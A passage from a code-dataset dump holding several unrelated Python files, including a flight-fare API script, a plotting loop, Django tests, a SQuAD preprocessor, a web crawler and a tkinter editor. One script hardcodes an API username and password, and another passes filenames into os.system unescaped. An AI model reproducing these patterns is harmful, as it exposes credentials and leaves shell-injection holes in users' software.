date.date()\n\n# haversine function roubada daqui https://stackoverflow.com/questions/4913349/haversine-formula-in-python-bearing-and-distance-between-two-gps-points sorry, mas tenho pouco tempo :)\ndef haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a))\n r = 6371 # Radius of earth in kilometers. Use 3956 for miles\n return c * r\n\n# Retorna a distancia linear\ndef getLinearDistance(iata1, iata2, airport_list):\n\n lat1 = 0\n lat2 = 0\n lon1 = 0\n lon2 = 0\n\n for a in airport_list:\n if iata1 == a:\n lat1 = airport_list[a][\"lat\"]\n lon1 = airport_list[a][\"lon\"]\n if iata2 == a:\n lat2 = airport_list[a][\"lat\"]\n lon2 = airport_list[a][\"lon\"]\n\n linear_distance = haversine(lat1, lon1, lat2, lon2)\n return linear_distance\n\n# Classe com os dados dos voos\nclass Flight:\n departure_time = \"\"\n arrival_time = \"\"\n aircraft= \"\"\n aircraftManufacturer= \"\"\n avgSpeed=0.0\n farePerKM=0.0\n\nflight_data_List = []\n\n# Calcula a velocidade aproximada\ndef getAvgSpeed(linear_distance, time_diff):\n (h, m, s) = str(time_diff).split(':')\n t = float(h) + float(m)/60 + float(s)/3600\n avgSpeed = float(linear_distance) / t\n return format(avgSpeed, '.2f')\n\n# Retorna a distancia, velocidade aproximada e valor por km\ndef getFlightData(linear_distance, flight_list):\n l = []\n for flight in flight_list[\"options\"]:\n f = Flight()\n arrival_time = datetime.strptime(flight[\"arrival_time\"], \"%Y-%m-%dT%H:%M:%S\")\n departure_time = datetime.strptime(flight[\"departure_time\"], \"%Y-%m-%dT%H:%M:%S\")\n time_diff = abs(departure_time - arrival_time)\n f.arrival_time = arrival_time\n f.departure_time = departure_time\n f.avgSpeed = getAvgSpeed(linear_distance, time_diff)\n f.farePerKM = format(float(linear_distance) / float(flight[\"fare_price\"]), '.2f')\n f.aircraft = flight[\"aircraft\"][\"model\"]\n f.aircraftManufacturer = flight[\"aircraft\"][\"manufacturer\"]\n\n l.append(f)\n\n return l\n\nfor a1 in airport_list1:\n for a2 in airport_list2:\n\n iata1 = a1\n iata2 = a2\n\n url = \"http://stub.2xt.com.br/air/search/{}/{}/{}/{}\".format(apiKey, iata1, iata2, date)\n\n # Busca a lista de opçoes de voo\n flight_search_response = requests.get(url, auth = ('helcio', 'sejvlD'))\n flight_list = json.loads(flight_search_response.text)\n\n linear_distance = getLinearDistance(iata1, iata2, airport_list)\n flight_data_List = getFlightData(linear_distance, flight_list)\n\n for f in flight_data_List:\n t = \"Partida: {} Destino: {} Saida: {} Chegada: {} Aeronave: {} {} - Velocidade Aprox.: {} KM/h - Valor por KM: BRL {}\"\n print(t.format(a1, a2, f.departure_time, f.arrival_time, f.aircraftManufacturer, f.aircraft, f.avgSpeed, f.farePerKM))\n","sub_path":"python/2XTscript.py","file_name":"2XTscript.py","file_ext":"py","file_size_in_byte":3754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"630426877","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport json\n\nplt.ion()\n\n#N=20\nexact=-1.274549484318e+00*20\n\n#N=80\n# exact=-1.273321360724e+00*80\n\nwhile(True):\n plt.clf()\n plt.ylabel('Energy')\n plt.xlabel('Iteration #')\n\n iters=[]\n energy=[]\n sigma=[]\n evar=[]\n evarsig=[]\n\n data=json.load(open('test.log'))\n for iteration in data[\"Output\"]:\n iters.append(iteration[\"Iteration\"])\n energy.append(iteration[\"Energy\"][\"Mean\"])\n sigma.append(iteration[\"Energy\"][\"Sigma\"])\n evar.append(iteration[\"EnergyVariance\"][\"Mean\"])\n evarsig.append(iteration[\"EnergyVariance\"][\"Sigma\"])\n\n nres=len(iters)\n cut=200\n if(nres>cut):\n\n fitx=iters[-cut:-1]\n fity=energy[-cut:-1]\n z=np.polyfit(fitx,fity,deg=0)\n p = np.poly1d(z)\n\n plt.xlim([nres-cut,nres])\n maxval=np.max(energy[-cut:-1])\n plt.ylim([exact-(np.abs(exact)*0.01),maxval+np.abs(maxval)*0.01])\n error=(z[0]-exact)/-exact\n plt.gca().text(0.95, 0.8, 'Relative Error : '+\"{:.2e}\".format(error),\n verticalalignment='bottom', horizontalalignment='right',\n color='green', fontsize=15,transform=plt.gca().transAxes)\n\n plt.plot(fitx,p(fitx))\n\n plt.errorbar(iters,energy,yerr=sigma,color='red')\n plt.axhline(y=exact, xmin=0, xmax=iters[-1], linewidth=2, color = 'k',label='Exact')\n\n\n plt.legend(frameon=False)\n plt.pause(1)\n # plt.draw()\n\nplt.ioff()\nplt.show()\n","sub_path":"Examples/CustomHamiltonian/plot_ising.py","file_name":"plot_ising.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"276910324","text":"from selenium.webdriver.common.by import By\n\nfrom components.authenticate import Authenticate\n\n\nclass FirstSearchResultPage(Authenticate):\n\n def click_on_examples_link(self):\n example_link = 'Examples'\n examples = self.driver.find_element(By.LINK_TEXT, example_link)\n examples.click()\n\n def count_number_of_examples(self):\n example_id = 'examples'\n li_tag = 'li'\n\n examples = self.driver.find_element(By.ID, example_id)\n listed_examples = examples.find_elements(By.TAG_NAME, li_tag)\n\n return len(listed_examples)\n","sub_path":"pages/first_result.py","file_name":"first_result.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"191500110","text":"from bs4 import BeautifulSoup\nimport requests\n\n\nalph = \"abcdefghijklmnopqrstuvwxyz\"\n\ncount = 0\n\nfor letter in alph:\n # this can run a long time its helpfull to know which letter its on\n print(letter)\n url = \"http://www.mso.anu.edu.au/~ralph/OPTED/v003/wb1913_\" + letter + \".html\" #there is a page for each letter\n req = requests.get(url) #grab page\n soup = BeautifulSoup(req.text, \"html.parser\") #get parser\n dictionary = soup.find_all('p') # find all the dictionary entries\n for entries in dictionary:\n word = entries.find('b').getText() # get the word itself\n pos = entries.find('i').getText() # get the part of speech\n cut = len(word) + len(pos) + 4 # calulate how much word and pos take up\n definition = entries.getText()[cut:] # cut that from the total sting to get definition\n #\n #\n # DO what you need here\n # this loop will run through all the words in the \n # english dictionary, seperating them by word, pos and definition\n #\n #\n \n\n\n\n\n\n","sub_path":"dictionaryScript.py","file_name":"dictionaryScript.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"630177791","text":"import collections\n\nclass Solution(object):\n def shortestPathBinaryMatrix(self, grid):\n \"\"\"\n :type grid: List[List[int]]\n :rtype: int\n \"\"\"\n \n value_list = collections.deque([(0, 0, 1)])\n res = -1\n \n if grid[0][0] or grid[-1][-1]:\n \n return res\n \n while value_list:\n temp_value = len(value_list)\n \n for _ in range(temp_value):\n i, j, cost = value_list.popleft()\n \n if i == len(grid) - 1 and j == len(grid) - 1:\n res = cost\n \n return res\n \n for a, b in [(i - 1, j - 1), (i - 1, j), (i - 1, j + 1), (i, j - 1), (i, j + 1), (i + 1, j - 1), (i + 1, j), (i + 1, j + 1)]:\n if 0 <= a and a < len(grid) and 0 <= b and b < len(grid[0]) and not grid[a][b]:\n grid[a][b] = 1\n value_list.append((a, b, cost + 1))\n \n return res","sub_path":"practice/solution/1091_shortest_path_in_binary_matrix.py","file_name":"1091_shortest_path_in_binary_matrix.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"576004091","text":"#!/usr/bin/python\n\n# python 2.7.6\n# pygame 1.9.2\n\nimport pygame\nimport sys\nimport time\nimport math\nimport operator\nimport random\nimport numpy\n\nfrom constants import *\nfrom irsensor import IR_Sensor\nfrom robot import Robot\nfrom camera import Camera\nfrom controller import Controller\nfrom obstacle import Obstacle\n\n\npygame.init()\npygame.key.set_repeat(20,20)\n\n\ncounter = 0\n\nscreen = pygame.display.set_mode(size)\ncontroller = Controller(screen)\n\ncam_screen = pygame.Surface((160, 480))\n\nvelocity = velocityX, velocityY = 1, 1\n\n\n\nrobots = []\n\nobstacles = []\nobstacles.append(Obstacle((10, 100), (200, 30), colors['green'], screen))\nobstacles.append(Obstacle((10, 100), (200, 200), colors['green'], screen))\nobstacles.append(Obstacle((100, 10), (200, 200), colors['green'], screen))\nobstacleRects = []\n\nfor obstacle in obstacles:\n obstacleRects.append(obstacle.rect)\n\n# TODO: controls need to be handled in update()\ndef update():\n global automaticMode\n global counter\n\n # close out if quit button is pressed on window\n if (pygame.event.peek(pygame.QUIT)):\n pygame.display.quit()\n sys.exit()\n\n # control input\n for event in pygame.event.get():\n if event.type == pygame.MOUSEBUTTONDOWN:\n robots.append(Robot((pygame.mouse.get_pos()[0],\n pygame.mouse.get_pos()[1]),45,math.pi/2, controller, counter,\n screen, cam_screen, obstacleRects))\n counter = counter + 1\n\n if event.type == pygame.KEYDOWN: \n if event.key == pygame.K_LEFT:\n controller.rotate_ccw()\n\n if event.key == pygame.K_RIGHT:\n controller.rotate_cw()\n\n if event.key == pygame.K_DOWN:\n controller.move_backward() \n\n if event.key == pygame.K_UP:\n controller.move_forward() \n\n if event.key == pygame.K_a:\n automaticMode = True\n if event.key == pygame.K_m:\n automaticMode = False\n\n if event.type == pygame.KEYUP:\n controller.color = colors['white']\n controller.is_moving = False\n\n controller.update()\n for robot in robots:\n robot.update()\n\ndef render():\n screen.fill(colors['black'])\n controller.draw()\n for robot in robots:\n robot.draw()\n for obstacle in obstacles:\n obstacle.draw()\n pygame.display.flip()\n\n# TODO: maybe make a Game object that gets instantiated in __main__\nwhile 1:\n # update portion\n update()\n \n # render portion\n render()\n\n","sub_path":"simulation/singlesim/sim.py","file_name":"sim.py","file_ext":"py","file_size_in_byte":2540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"25774088","text":"import json\nfrom datetime import date\n\nfrom django.test import TestCase\nfrom django.core.urlresolvers import reverse\nfrom django.conf import settings\nfrom django.test.client import Client\n\nfrom models import Person\nfrom test_skryaga.main.tests import ResponseSuccessMixin\n\n\nclass PersonBase(TestCase):\n \"\"\" Person test base class \"\"\"\n\n fixtures = ['person_testdata.json']\n\n\nclass PersonModelTests(PersonBase):\n \"\"\" Tests for Person model \"\"\"\n\n def test_model_count(self):\n \"\"\" Checking count of Person model items. \"\"\"\n self.assertEqual(Person.objects.all().count(), 1)\n\n\nclass PersonDetailTests(PersonBase, ResponseSuccessMixin):\n \"\"\" Tests for person_detail view \"\"\"\n\n PERSON_CONTEXT_NAME = \"person\"\n\n def setUp(self):\n super(PersonDetailTests, self).setUp()\n self.resp = self.client.get(reverse(\"person_detail\"))\n\n def test_contact_valid(self):\n \"\"\" Check person info is valid \"\"\"\n person = Person.objects.get(pk=settings.DEFAULT_PERSON_PK)\n self.assertTrue(self.PERSON_CONTEXT_NAME in self.resp.context)\n self.assertEqual(self.resp.context[self.PERSON_CONTEXT_NAME], person)\n\n\nclass PersonEditViewTests(PersonBase):\n \"\"\" Tests for person_edit view \"\"\"\n\n VIEW_URL = reverse(\"person_edit\")\n FORM_CONTEXT_NAME = \"form\"\n DEFAULT_EMPTY_ERROR = [\"This field is required.\"]\n VALID_PERSON_DATA = {\"first_name\": \"test\",\n \"last_name\": \"test\",\n \"birthday\": date(2000, 1, 1),\n \"email\": \"test@test.com\",\n \"jabber\": \"jabber@jabber.com\",\n \"skype\": \"test\",\n \"other_contacts\": \"test\",\n \"bio\": \"test\"}\n \n def setUp(self):\n self.client = Client()\n self.client.login(**settings.DEFAULT_USER_CREDENTIALS)\n\n def test_success_status(self):\n \"\"\" Checking response status is success for logged user \"\"\"\n resp = self.client.get(self.VIEW_URL)\n self.assertEqual(resp.status_code, settings.HTTP_STATUS_OK)\n\n def test_anonymous_redirect(self):\n \"\"\" Checking access to the page for anonymous \"\"\"\n self.client.logout()\n resp = self.client.get(self.VIEW_URL)\n self.assertEqual(resp.status_code, settings.HTTP_STATUS_REDIRECT)\n\n def test_form_context(self):\n \"\"\" Checking form variable in context \"\"\"\n resp = self.client.get(self.VIEW_URL)\n self.assertEqual(resp.status_code, settings.HTTP_STATUS_OK)\n self.assertTrue(self.FORM_CONTEXT_NAME in resp.context)\n\n def test_empty_required_field(self):\n \"\"\" Checking that view returns error while form is empty \"\"\"\n resp = self.client.post(self.VIEW_URL, {\"first_name\": \"\"})\n self.assertEqual(resp.status_code, settings.HTTP_STATUS_OK)\n self.assertTrue(\n resp.context[self.FORM_CONTEXT_NAME]['first_name'].errors)\n\n def test_empty_form(self):\n \"\"\" Checking emty post case \"\"\"\n resp = self.client.post(self.VIEW_URL, {})\n self.assertEqual(resp.status_code, settings.HTTP_STATUS_OK)\n self.assertFalse(resp.context[self.FORM_CONTEXT_NAME].is_valid())\n\n def test_valid_form(self):\n \"\"\" Checking valid form case and should return redirect \"\"\"\n resp = self.client.post(self.VIEW_URL, self.VALID_PERSON_DATA)\n self.assertEqual(resp.status_code, settings.HTTP_STATUS_REDIRECT)\n\n def test_ajax_request_valid(self):\n \"\"\"\n Checking ajax form submit return redirect status and\n json response is None (means no errors)\n \"\"\"\n resp = self.client.post(self.VIEW_URL, self.VALID_PERSON_DATA,\n HTTP_X_REQUESTED_WITH='XMLHttpRequest')\n self.assertEqual(resp.status_code, settings.HTTP_STATUS_OK)\n self.assertTrue(json.loads(resp.content) is None)\n\n def test_ajax_request_invalid_data(self):\n \"\"\"\n Checking if ajax post request with emty data\n returns json with errors\n \"\"\"\n resp = self.client.post(self.VIEW_URL, {\"test\": None},\n HTTP_X_REQUESTED_WITH='XMLHttpRequest')\n self.assertEqual(resp.status_code, settings.HTTP_STATUS_OK)\n resp_dict = json.loads(resp.content)\n self.assertTrue(isinstance(resp_dict, dict))\n self.assertEqual(resp_dict['first_name'], self.DEFAULT_EMPTY_ERROR)\n","sub_path":"test_skryaga/contact/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"254202700","text":"# pylint: disable=W0611\n\nimport os\nfrom time import sleep\nfrom flask import Flask\nfrom random import random\nfrom sqlalchemy.exc import OperationalError\n\nfrom repository.checks import check_from_model\nfrom utils.setup import setup\nfrom utils.database import db\n\n\nSLEEP_TIME = 1\n\nFLASK_APP = Flask(__name__)\n\n\nsetup(FLASK_APP)\n\n\nTABLE_NAME = f'check_health_{int(1000*random())}'\nclass CheckHealth(db.Model):\n __tablename__ = TABLE_NAME\n\n\nIS_DATABASE_CONNECT_OK = False\nwhile not IS_DATABASE_CONNECT_OK:\n try:\n CheckHealth.__table__.drop(db.session.bind, checkfirst=True)\n CheckHealth.__table__.create(db.session.bind)\n db.session.commit()\n except OperationalError:\n print('Could not connect to postgres db... Retry in {}s...'.format(SLEEP_TIME))\n sleep(SLEEP_TIME)\n continue\n print('Connection to postgres db is okay.')\n IS_DATABASE_CONNECT_OK = True\n\nIS_DATABASE_HEALTH_OK = False\nwhile not IS_DATABASE_HEALTH_OK:\n IS_DATABASE_HEALTH_OK = check_from_model(CheckHealth)[0]\n db.session.execute(f'DROP TABLE {TABLE_NAME};')\n db.session.commit()\n if not IS_DATABASE_HEALTH_OK:\n print('Could not check database health... Retry in {}s...'.format(SLEEP_TIME))\n else:\n print('Database health is ok.')\n","sub_path":"api/checkhealth.py","file_name":"checkhealth.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"101359155","text":"import yaml\nfrom datetime import datetime\nimport os\n\ndef clipz(input_file, test=True, output_folder = '.\\\\'):\n print('Loading {}...'.format(input_file))\n with open(input_file) as f:\n clips = yaml.load(f, Loader=yaml.FullLoader)\n\n for clip in clips:\n input_video = list(clip.keys())[0]\n\n try:\n os.mkdir(output_folder)\n except:\n pass\n\n for start, stop, output_video in clip[input_video]:\n print('{}-{}\\t{}'.format(start, stop, output_video))\n \n delta = datetime.strptime(stop, '%M:%S') - datetime.strptime(start, '%M:%S')\n input_path = os.path.abspath(input_video)\n output_path = os.path.abspath(output_folder +'\\\\' + output_video)\n\n cmd = 'ffmpeg -i \"{:}\" -ss {:} -t {:} \"{:}\"'.format(input_path, start, str(delta), output_path)\n \n if test:\n print(cmd)\n else:\n os.system(cmd)","sub_path":"clipz.py","file_name":"clipz.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"520475497","text":"from tqdm import tqdm\nfrom pprint import pprint\nimport unicodedata\nimport json\nfrom collections import Counter\nimport spacy\nimport re\nimport numpy as np\n\nfrom .preprocess_utils import *\n\ndef load_data(fname, train, data=None):\n '''\n load data from Squad 2.0\n Returns a list of rows, each containing a dictionary with keys:\n uid, context, question, answer, answer_start, answer_end\n '''\n rows = []\n if not data:\n with open(fname, encoding=\"utf8\") as f:\n data = json.load(f)['data']\n\n print(f'reading from {fname}')\n for article in tqdm(data, total=len(data)):\n for paragraph in article['paragraphs']:\n context = paragraph['context']\n context = f'{context} {END}'\n for q in paragraph['qas']:\n uid, question = q['id'], q['question']\n answers = q.get('answers', [])\n is_impossible = q.get('is_impossible', False)\n label = 1 if is_impossible else 0\n if train:\n if len(answers) > 0:\n answer = answers[0]['text']\n answer_start = answers[0]['answer_start']\n answer_end = answer_start + len(answer)\n row = {'uid': uid, 'context': context, 'question': question, 'answer': answer, 'answer_start': answer_start, 'answer_end':answer_end, 'label': label}\n else:\n row = {'uid': uid, 'context': context, 'question': question, 'answer': answers, 'answer_start': -1, 'answer_end':-1}\n rows.append(row)\n return rows\n\ndef load_emb_vocab(fname, dim):\n '''\n load the glove embeddings\n Returns a set of words\n '''\n vocab = set()\n with open(fname, encoding='utf-8') as f:\n next(f) # skip header\n for line in f:\n elems = line.split()\n token = normalize_text(' '.join(elems[0:-dim]))\n vocab.add(token)\n return vocab\n\ndef build_vocab(data, glove_vocab, sort_all, batch_size=4096, threads=24):\n '''\n Returns vocabulary objects for all words, PoS tags and NER tags\n '''\n nlp = spacy.load('en', disable=['vectors', 'textcat', 'parser'])\n\n # docs\n print('Tokenizing docs')\n docs = [reform_text(row['context']) for row in data]\n doc_tokened = list(nlp.pipe(docs, batch_size=batch_size, n_threads=threads))\n\n #questions\n print('Tokenizing questions')\n questions = [reform_text(sample['question']) for sample in data]\n questions_tokened = list(nlp.pipe(questions, batch_size=batch_size, n_threads=threads))\n\n tag_counter = Counter()\n ner_counter = Counter()\n if sort_all:\n counter = Counter()\n merged = doc_tokened + questions_tokened\n print(f'finding tags and name entities (combined)')\n for tokened in tqdm(merged, total=len(data)):\n counter.update([normalize_text(w.text) for w in tokened if len(normalize_text(w.text)) > 0])\n tag_counter.update([w.tag_ for w in tokened if len(w.text) > 0])\n ner_counter.update([f'{w.ent_type_}_{w.ent_iob_}' for w in tokened])\n vocab = sorted([w for w in counter if w in glove_vocab], key=counter.get, reverse=True)\n else:\n query_counter = Counter()\n doc_counter = Counter()\n print(f'finding tags and name entities (separate)')\n for tokened in tqdm(doc_tokened, total=len(doc_tokened)):\n doc_counter.update([normalize_text(w.text) for w in tokened if len(normalize_text(w.text)) > 0])\n tag_counter.update([w.tag_ for w in tokened if len(w.text) > 0])\n ner_counter.update([f'{w.ent_type_}_{w.ent_iob_}' for w in tokened])\n\n for tokened in tqdm(questions_tokened, total=len(questions_tokened)):\n query_counter.update([normalize_text(w.text) for w in tokened if len(normalize_text(w.text)) > 0])\n tag_counter.update([w.tag_ for w in tokened if len(w.text) > 0])\n ner_counter.update([f'{w.ent_type_}_{w.ent_iob_}' for w in tokened])\n counter = query_counter + doc_counter\n\n # sort query words\n vocab = sorted([w for w in query_counter if w in glove_vocab], key=query_counter.get, reverse=True)\n vocab += sorted([w for w in doc_counter.keys() - query_counter.keys() if w in glove_vocab], key=counter.get, reverse=True)\n\n tag_vocab, ner_vocab = None, None\n tag_counter = sorted([w for w in tag_counter], key=tag_counter.get, reverse=True)\n ner_counter = sorted([w for w in ner_counter], key=ner_counter.get, reverse=True)\n tag_vocab = Vocabulary.build(tag_counter)\n ner_vocab = Vocabulary.build(ner_counter)\n print(f'POS Tag vocab size: {len(tag_vocab)}')\n print(f'NER Tag vocab size: {len(ner_vocab)}')\n\n total = sum(counter.values())\n matched = sum(counter[w] for w in vocab)\n\n print(f'Raw vocab size vs vocab in glove: {len(counter)}/{len(vocab)}')\n print(f'OOV rate: {round(100.0 * (total - matched)/total, 4)} = {(total - matched)}/{total}') # Out of vocab rate\n vocab = Vocabulary.build(vocab)\n\n print(f'final vocab size: {len(vocab)}')\n\n return vocab, tag_vocab, ner_vocab\n\ndef build_embedding(fname, vocab, dim):\n '''\n Build word embeddings for each word in vocabulary\n Returns a 2-d matrix of size vocab_size x embedding_dim\n '''\n vocab_size = len(vocab)\n emb = np.zeros((vocab_size, dim))\n emb[0] = 0\n with open(fname, encoding='utf-8') as f:\n next(f) # skip header\n for line in f:\n elems = line.split()\n token = normalize_text(' '.join(elems[0:-dim]))\n if token in vocab:\n emb[vocab[token]] = [float(v) for v in elems[-dim:]]\n return emb\n\ndef postag_func(toks, vocab):\n '''return POS tags for specified tokens from the vocabulary'''\n return [vocab[w.tag_] for w in toks if len(w.text) > 0]\n\ndef nertag_func(toks, vocab):\n '''return POS tags for specified tokens from the vocabulary'''\n return [vocab[f'{w.ent_type_}_{w.ent_iob_}'] for w in toks if len(w.text) > 0]\n\ndef tok_func(toks, vocab, doc_toks=None):\n return [vocab[w.text] for w in toks if len(w.text) > 0]\n\ndef raw_txt_func(toks):\n return [w.text for w in toks if len(w.text) > 0]\n\ndef match_func(question, context):\n ''' return exact match (to a question token) for each word in the context '''\n counter = Counter(w.text.lower() for w in context)\n total = sum(counter.values())\n freq = [counter[w.text.lower()] / total for w in context]\n question_word = {w.text for w in question}\n question_lower = {w.text.lower() for w in question}\n question_lemma = {w.lemma_ if w.lemma_ != '-PRON-' else w.text.lower() for w in question}\n match_origin = [1 if w in question_word else 0 for w in context]\n match_lower = [1 if w.text.lower() in question_lower else 0 for w in context]\n match_lemma = [1 if (w.lemma_ if w.lemma_ != '-PRON-' else w.text.lower()) in question_lemma else 0 for w in context]\n features = np.asarray([freq, match_origin, match_lower, match_lemma], dtype=np.float32).T.tolist()\n return features\n\ndef build_span(context, answer, context_token, answer_start, answer_end, is_train=True):\n ''' Returns the exact answer span as a tuple '''\n p_str = 0\n p_token = 0\n t_start, t_end, t_span = -1, -1, []\n while p_str < len(context):\n if re.match('\\s', context[p_str]):\n p_str += 1\n continue\n token = context_token[p_token]\n token_len = len(token)\n if context[p_str:p_str + token_len] != token:\n return (None, None, [])\n t_span.append((p_str, p_str + token_len))\n if is_train:\n if (p_str <= answer_start and answer_start < p_str + token_len):\n t_start = p_token\n if (p_str < answer_end and answer_end <= p_str + token_len):\n t_end = p_token\n p_str += token_len\n p_token += 1\n if is_train and (t_start == -1 or t_end == -1):\n return (-1, -1, [])\n else:\n return (t_start, t_end, t_span)\n\ndef feature_func(sample, query_tokend, doc_tokend, vocab, vocab_tag, vocab_ner, is_train):\n ''' Builds all features (seperately) and returns a dict with all of them '''\n # features\n fea_dict = {}\n fea_dict['uid'] = sample['uid']\n if is_train:\n fea_dict['label'] = sample['label']\n fea_dict['query_tok'] = tok_func(query_tokend, vocab)\n fea_dict['query_pos'] = postag_func(query_tokend, vocab_tag)\n fea_dict['query_ner'] = nertag_func(query_tokend, vocab_ner)\n fea_dict['doc_tok'] = tok_func(doc_tokend, vocab)\n fea_dict['doc_pos'] = postag_func(doc_tokend, vocab_tag)\n fea_dict['doc_ner'] = nertag_func(doc_tokend, vocab_ner)\n fea_dict['doc_fea'] = str(match_func(query_tokend, doc_tokend))\n fea_dict['query_fea'] = str(match_func(doc_tokend, query_tokend))\n doc_toks = [t.text for t in doc_tokend if len(t.text) > 0]\n query_toks = [t.text for t in query_tokend if len(t.text) > 0]\n answer_start = sample['answer_start']\n answer_end = sample['answer_end']\n answer = sample['answer']\n fea_dict['doc_ctok'] = doc_toks\n fea_dict['query_ctok'] = query_toks\n\n start, end, span = build_span(sample['context'], answer, doc_toks, answer_start,\n answer_end, is_train=is_train)\n if is_train and (start == -1 or end == -1): return None\n if not is_train:\n fea_dict['context'] = sample['context']\n fea_dict['span'] = span\n fea_dict['start'] = start\n fea_dict['end'] = end\n return fea_dict\n\ndef build_data(data, vocab, vocab_tag, vocab_ner, fout, NLP, is_train, batch_size=4096, threads=24):\n '''\n Builds the final dataset (feature dictionary) and writes it to fout\n '''\n print('Tokenize document')\n passages = [reform_text(sample['context']) for sample in data]\n passage_tokened = [doc for doc in NLP.pipe(passages, batch_size=batch_size, n_threads=threads)]\n\n print('Tokenize question')\n question_list = [reform_text(sample['question']) for sample in data]\n question_tokened = [question for question in NLP.pipe(question_list, batch_size=batch_size, n_threads=threads)]\n dropped_sample = 0\n\n print(f'Writing to {fout}')\n with open(fout, 'w', encoding='utf-8') as writer:\n for idx, sample in enumerate(tqdm(data)):\n feat_dict = feature_func(sample, question_tokened[idx], passage_tokened[idx], vocab, vocab_tag, vocab_ner, is_train)\n if feat_dict is not None:\n writer.write(json.dumps(feat_dict) + '\\n')\n else:\n dropped_sample += 1\n\n print(f'dropped {dropped_sample} in total {len(data)}')\n","sub_path":"utils/preprocess_func.py","file_name":"preprocess_func.py","file_ext":"py","file_size_in_byte":10674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"589127195","text":"from gui_widget_pyqt5 import *\n\nheader = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko'}\nmelon = requests.get('https://www.melon.com/chart/index.htm', headers=header) # Top 100 차트 크롤링\nmelon_html = melon.text\nmelon_parse = BeautifulSoup(melon_html, 'html.parser')\n\nlst100 = melon_parse.select('.lst50,.lst100')\n\nmelonDict = {}\nfor i in lst100:\n temp_list = [i.select_one('.ellipsis.rank01').a.text, i.select_one('.ellipsis.rank02').a.text]\n melonDict[int(i.select_one('.rank').text)] = temp_list\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n mainWindow = MainWindow(melonDict)\n mainWindow.show()\n sys.exit(app.exec_())","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"483876263","text":"from tkinter import filedialog\r\nfrom tkinter import *\r\nimport tkinter as tk\r\nfrom PIL import Image, ImageTk\r\nimport os\r\nimport pymongo\r\nfrom pymongo import MongoClient\r\n\r\n'''\r\nlast updated 12/6/2017\r\n\r\ntextLibraryRegion.py\r\nThis file contains the code for text editor and\r\nlibrary region\r\n'''\r\n\r\n#from course notes\r\ndef rgbString(red, green, blue):\r\n return \"#%02x%02x%02x\" % (red, green, blue)\r\n\r\n#############################################\r\n############### Text Region #################\r\n#############################################\r\n\r\n# creates a tkinter text widget\r\ndef createText(canvas,project,db):\r\n global text\r\n canvas.create_text(400,90,text=\"Text\",\r\n font=\"Impact 23\",anchor=\"nw\",fill=rgbString(125,51,35))\r\n text = Text(canvas,width=44,height=18,wrap=WORD)\r\n text.config(font=project.font)\r\n canvas.create_window((400,130),window=text,anchor=\"nw\")\r\n scroll = Scrollbar(canvas)\r\n canvas.create_window((756,130),window=scroll,height=347,anchor=\"nw\")\r\n scroll.config(command=text.yview)\r\n saveb = Button(canvas,text=\"Save\",\r\n command=lambda:saveText(canvas,project,db),\r\n background=\"white\",borderwidth=0,foreground=rgbString(125,51,35),\r\n padx=6,pady=3,font=\"Impact\")\r\n canvas.create_window((40,35),window=saveb,anchor=\"nw\")\r\n openb = Button(canvas,text=\"Open\",\r\n command=lambda:openText(canvas,project),\r\n background=\"white\",borderwidth=0,foreground=rgbString(125,51,35),\r\n padx=6,pady=3,font=\"Impact\")\r\n canvas.create_window((100,35),window=openb,anchor=\"nw\")\r\n\r\ndef insertText(canvas,project):\r\n text.insert('end-1c',project.file)\r\n\r\n# this function enables the save text file function\r\ndef saveText(canvas,project,db):\r\n try:\r\n t = text.get(\"1.0\", \"end-1c\")\r\n project.file = t\r\n result = db.posts.update_one({\"name\":project.name},\\\r\n {'$set':{\"file\":t,\"font\":project.font,\\\r\n \"library\":project.library}})\r\n saveLocation=filedialog.asksaveasfilename(\\\r\n initialdir = \"/\",title = \"Select file\",filetypes = \\\r\n ((\"txt files\",\"*.txt\"),(\"all files\",\"*.*\")))\r\n file1=open(saveLocation, \"w+\")\r\n file1.write(t)\r\n file1.close()\r\n except:\r\n pass\r\n\r\n# open up a txt file\r\ndef openText(canvas,project):\r\n try:\r\n openLocation = filedialog.askopenfilename(\\\r\n initialdir = \"/\",title = \"Select file\",filetypes = \\\r\n ((\"txt files\",\"*.txt\"),(\"all files\",\"*.*\")))\r\n myFile = open(openLocation, 'r')\r\n content = myFile.read()\r\n text.delete(1.0, END)\r\n text.insert('end-1c',content)\r\n except:\r\n pass\r\n\r\ndef chooseFont(canvas,project,string,db):\r\n project.file = text.get(1.0,'end-1c')\r\n project.font = string\r\n createText(canvas,project,db)\r\n text.insert('end-1c',project.file)\r\n\r\ndef createFontMenu(canvas,project,db):\r\n v = StringVar()\r\n canvas.create_text(440,510,text=\"Styling\",\r\n font=\"Impact 